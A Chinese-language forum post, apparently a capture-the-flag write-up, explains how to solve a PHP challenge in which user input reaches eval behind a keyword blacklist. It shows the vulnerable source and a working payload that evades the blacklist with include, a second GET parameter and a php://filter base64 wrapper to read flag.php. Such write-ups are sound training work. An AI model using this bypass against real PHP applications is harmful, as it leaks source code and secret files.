CTF-25解题思路

Track-子羽   ·   发表于 2021-11-17 15:12:03   ·   CTF&WP专版

源码分析:

  1. <?php error_reporting(0);
  2. if(isset($_GET['c']))
  3. {
  4. $c = $_GET['c'];
  5. if(!preg_match("/flag|system|exec|shell|php|\.| |\'|\`|echo|\;|\(/i", $c))
  6. {
  7. eval($c);
  8. }
  9. }
  10. else
  11. {
  12. highlight_file(__FILE__);
  13. }

考点:

绕过特殊字符和一些函数的过滤

payload:

  1. ?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

知识点:

include可以不用括号,分号可以用?>代替

打赏我,让我更有动力~

0 Reply   |  Until 22天前 | 43 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2021 掌控者 All Rights Reserved.